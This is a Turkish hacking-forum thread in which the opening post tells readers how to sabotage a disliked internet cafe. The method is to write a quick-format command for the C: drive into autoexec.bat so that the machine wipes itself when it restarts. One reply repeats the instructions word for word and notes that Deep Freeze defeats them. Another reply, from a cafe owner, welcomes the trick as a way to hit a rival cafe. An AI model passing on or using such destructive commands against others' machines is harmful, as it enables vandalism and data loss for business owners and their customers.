cafeyi gümletin :D

Se-ZeR

Emektar
12 Tem 2008
10,796
117
Antalya
sevmediğiniz bir internet cafeyiii çok kolay bi yolla gümletin.
herhangi bi masaya oturun biraz takılın kalkmadan az bi zmn öncee
c: nin içinde bulunan autoexec.bat dosyasını not defteriyle aç içine

"format c:/q/autotest"

yazz ve kaydeet(önemli).işte bu kdrrrr.
sora bilgisayar kapanıp açıldığındaaaa formattt
kolay gelsinnnnnnnn

EMEĞE SAYGII

sXe_61

Katılımcı Üye
14 Şub 2009
388
0
30
Ms-DoS
:) güzel paylaşım ben 1 kere cafeye gitmistim meğer flash belleğimde oyundan bulasan 1 ton virüs varmıs taktım 5 dk sonra tüm Pc ler alarm vermeye başladı 1 de anti virüs olmasaydı ne olcaktı o gün az daha dayak yiodum cafecide n:)

kadirwolf

Katılımcı Üye
12 Mar 2008
717
10
İstanbul
sevmediğiniz bir internet cafeyiii çok kolay bi yolla gümletin.
herhangi bi masaya oturun biraz takılın kalkmadan az bi zmn öncee
c: nin içinde bulunan autoexec.bat dosyasını not defteriyle aç içine

"format c:/q/autotest"

yazz ve kaydeet(önemli).işte bu kdrrrr.
sora bilgisayar kapanıp açıldığındaaaa formattt
kolay gelsinnnnnnnn

EMEĞE SAYGII

Artık hemen hemen bütün cafelerde deep-freeze programı var pc açılıp kapandıgında eski haline döner bi işe yaramaz anlayacağınız..

Rotasız-Kaptan

Yeni üye
14 Tem 2009
11
0
ElazıĞ
Ellerıne Sağlık Bende Internet Cafe Yönetıyom Benım ekmöegımle Oynadılar Benım Yanımda Baska Cafe Actılar Bu ıyı olacak Cok Saol +REP TŞK

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.